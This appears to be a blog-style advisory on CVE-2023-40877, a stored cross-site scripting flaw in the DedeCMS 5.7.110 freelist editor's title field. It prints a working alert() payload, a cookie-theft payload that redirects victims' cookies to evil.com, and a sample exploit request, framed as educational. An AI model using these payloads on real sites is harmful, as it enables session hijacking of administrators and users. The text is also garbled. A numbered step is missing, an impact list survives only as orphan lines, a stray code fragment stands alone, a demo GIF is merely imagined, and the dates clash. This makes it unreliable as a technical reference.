CVE-2023-40877 - Uncovering an XSS Vulnerability in DedeCMS 5.7.110 (Exploit Example Inside)

DedeCMS is one of China’s most widely used open-source content management systems. If your site relies on it, you might be at risk from a Cross-Site Scripting (XSS) vulnerability uncovered in version 5.7.110 and below, cataloged as CVE-2023-40877. This post breaks down the bug, provides an exploit example in easy-to-follow terms, and offers guidance on staying safe.

What is CVE-2023-40877?

This XSS flaw happens because DedeCMS fails to clean user-supplied input in the title parameter of the /dede/freelist_edit.php page. An attacker can inject JavaScript code, which will get executed in the browser of anyone who views a malicious entry.

Reference:
- NVD CVE Detail
- Exploit Database

Redirect users elsewhere

All without needing deep access to your web server.

Where’s the Vulnerability?

In DedeCMS 5.7.110 and earlier, when you add or edit a freelist (under /dede/freelist_edit.php), the title field is not properly escaped. That means user input is put directly into the HTML, unfiltered.

Inside /dede/freelist_edit.php, the vulnerable part looks approximately like

<input name="title" id="title" value="<?php echo $row['title']; ?>" class="input-text" />

If someone submits a title like

"><script>alert('XSS')</script>

It will get inserted into the HTML as-is, breaking out of the input and popping up a JavaScript alert.

Step-by-Step Exploit

> Warning: This example is for educational and defensive use only!

Let’s see how an attacker could pull this off.

### 1. Log In as a User with Access to /dede/freelist_edit.php

Go to /dede/freelist_edit.php and set the title to this payload

"><script>alert('XSS')</script>

3. Save, then Preview or View the Entry

As soon as the page loads with the tainted title, your browser will execute the JavaScript, displaying an alert box. A more malicious actor could do something like:

"><script>document.location='http://evil.com/steal?cookie='+document.cookie</script>;

Which would quietly send user cookies to an attacker’s server.

Here's how a typical request might look

POST /dede/freelist_edit.php?action=save HTTP/1.1
Host: yoursite.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=xxxx

id=1&title=%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&...

When reopening or previewing the freelist, the script runs.

Demo GIF

*(Imagine a GIF here showing the alert box firing as soon as the freelancer page is viewed!)*

Upgrade DedeCMS

Always run the latest version. Patch notes are available at DedeCMS official site.

`php

Restrict Admin Access

Make sure only trusted users can log in to /dede. XSS is especially dangerous in admin panels.

September 2023: CVE-2023-40877 published.

- Current: Exploit code published on Exploit-DB.

Check your DedeCMS version today.

For more info, see the official advisory and proof-of-concept exploit:
- CVE-2023-40877 on NVD
- Exploit-DB #51616

Timeline

Published on: 08/24/2023 15:15:07 UTC
Last modified on: 08/25/2023 13:20:20 UTC